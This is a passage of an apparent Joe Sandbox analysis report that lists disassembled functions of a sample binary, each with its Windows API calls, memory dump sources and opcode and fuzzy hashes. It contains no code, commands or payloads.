                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                          • Instruction ID: 5c765803349d97422d82fc52c79a732db028c2f14e816cc2e56e08bd287b64a9
                                                                          • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                          • Instruction Fuzzy Hash: 0331B43660D6454AE710DF69E444269B391E788FA8FC20235EE5A877A9DE3CE8428710
                                                                          Function 00007FF7ADC71B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                          • String ID:
                                                                          • API String ID: 2655805287-0
                                                                          • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                          • Instruction ID: 4c929dec245e0ebe30fbd4f75031bd74e9ead41efbdd50f5c4ddca283134361f
                                                                          • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                          • Instruction Fuzzy Hash: 5121F722B0E7824AEF44EB62A904275A690FF88FE0FC55530EE1D47BA5FE3CD4418710
                                                                          Function 00007FF7ADC92E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ForegroundPixelRelease
                                                                          • String ID:
                                                                          • API String ID: 4156661090-0
                                                                          • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                          • Instruction ID: 5e525924b4df3525412f64024fc3c883d79092ad2cc8ab61e2852b65da2dac56
                                                                          • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                          • Instruction Fuzzy Hash: 54216222B1D6518AEB04EB26D48406DE3A1FB89F91FC64035EE4D87765EE38D4428750
                                                                          Function 00007FF7ADC02370 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                          • Instruction ID: dc7e8912e417cdb34feadaa4c53f863b319d8ec3cad0ffa69316975e2d168a3e
                                                                          • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                          • Instruction Fuzzy Hash: 9E31507291E7419EE340AB01A8543A9FBA1FB49B90FD60139D98946770EF7DE8468B20
                                                                          Function 00007FF7ADC31F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 2067211477-0
                                                                          • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                          • Instruction ID: c297e269e392a7e1057b8058bee50547df67b9bbf90d0122a6a0ac1b60c47c41
                                                                          • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                          • Instruction Fuzzy Hash: 6D214125A0E7428DEE19EF659414179E290EF88B80BC54530EA4D03765EFACE4068620
                                                                          Function 00007FF7ADC3F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                          • Instruction ID: 5a2dda5e532cf487aa815fd17f2bf9a6338b5ce5e5d699a6df00d967fb48aef3
                                                                          • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                          • Instruction Fuzzy Hash: 2811B626E5EE830DF66C3128E4413B5D041EF94360FE74E31EA6E466FAEEFC54424120
                                                                          Function 00007FF7ADC6CAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                          • Instruction ID: 55b51291485122e1361b6491e3a3b96362578a3edfc093af42d0cebd10b1fddc
                                                                          • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                          • Instruction Fuzzy Hash: 61118836619B818AE710DF42E84015DBBB4FB88F80B964435CF9C03B64EF38E826C740
                                                                          Function 00007FF7ADC6CB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                          • Instruction ID: 266768b831ff9e37cc6b69f499ee6493aba3dcf7680e4e161a59f6abf81ea0b5
                                                                          • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                          • Instruction Fuzzy Hash: BD114C36A19B41CAE711DF52F84055DB7A4FB88F80B964436DF8943B64EF38E816C740
                                                                          Function 00007FF7ADC72ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                          • Instruction ID: bc55ee6bf86ac0b6cf089e87ae6f49aaff1284d91ef499b9aab0ec409562591a
                                                                          • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                          • Instruction Fuzzy Hash: 54115222A0D98285EF65AF24E454779A360FF88B44FC58031D94D476A8FF7CD587C720
                                                                          Function 00007FF7ADC80008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC8003C
                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC80047
                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC80055
                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF7ADC8005E
                                                                            • Part of subcall function 00007FF7ADC7F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7ADC80063,?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC7F7C9
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC8006A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3142591903-0
                                                                          • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                          • Instruction ID: 78e9bbe98ca24e53727536861d7a0c7ae445746916ebb04bc67fbabdec23ed24
                                                                          • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                          • Instruction Fuzzy Hash: 69014C3AA19B419AE740AF15E44022DB360FB88B51F904035DB8D43B65DF3CD492C750
                                                                          Function 00007FF7ADC022E8 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                          • Instruction ID: 507a0c5ceb07dca92b992e26665680c5ac9eb5f847ad442966c2be14f6d8ac9e
                                                                          • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                          • Instruction Fuzzy Hash: 17018C22D1E642AAE7557B10ADA43B8E725FF08B90FDA4130C95D0A2B0FF7DA4468220
                                                                          Function 00007FF7ADC31DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorExitLastThread
                                                                          • String ID:
                                                                          • API String ID: 1611280651-0
                                                                          • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                          • Instruction ID: 7ba4f121513692587f80ed2691ef20bf6f3d9a86139bb8cf8d87588fd2b841eb
                                                                          • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                          • Instruction Fuzzy Hash: 9C017C21B2EA429AEB0A7B20944417CE261EF40B74FD11734C63E036F1EF7CE85A8310
                                                                          Function 00007FF7ADC703F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                          • String ID:
                                                                          • API String ID: 179993514-0
                                                                          • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                          • Instruction ID: f881f712ff48a88768c0397327e41433aa7f851607028d82e5d2cc950b39b65a
                                                                          • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                          • Instruction Fuzzy Hash: 81F03010F2E6028AFF5537B5A8492789362FF8C741FD65030C80A42271FD2DE4975A20
                                                                          Function 00007FF7ADC7B5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                          • String ID:
                                                                          • API String ID: 179993514-0
                                                                          • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                          • Instruction ID: 6405fb86df4693062914a6a96f72e9b6199d9cba77af48a11a4c53d66eeac3fc
                                                                          • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                          • Instruction Fuzzy Hash: 99F06510F2E7024AFF5937B268486789253FF4C741FD65030C90A42272FD7DE4974A60
                                                                          Function 00007FF7ADC85F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                          • String ID: .lnk
                                                                          • API String ID: 3769357847-24824748
                                                                          • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                          • Instruction ID: c0c817fde94935921c4a36692600a5190b297778200aa613979766768cbdb7d0
                                                                          • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                          • Instruction Fuzzy Hash: B1D16E36B0AA5689EB00EF66D0906ADB7B0EB49F89FC64032DE4D47765EF39D446C310
                                                                          Function 00007FF7ADC40040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                          • API String ID: 3215553584-1196891531
                                                                          • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                          • Instruction ID: 1b047c8e5f1319f6d548991aa17abe3f718f7f1c3b932cfd4ecf31b4069f81d1
                                                                          • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                          • Instruction Fuzzy Hash: D681D4B2D8E202ADFB757F15854C23DA6A2EF11740FC64035CA0E536E4FB2DE852E261
                                                                          Function 00007FF7ADC36148 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID: !$acos
                                                                          • API String ID: 1156100317-2870037509
                                                                          • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                          • Instruction ID: ab46ab176de039b2cc68a0a2475a6cb44e14712646b5cfd1e6e7853c5c101bc6
                                                                          • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                          • Instruction Fuzzy Hash: 7261D421D2DF458CE2679B355811276E758EFA63C0FD28336E95E35A74EF6CE0838610
                                                                          Function 00007FF7ADC36408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
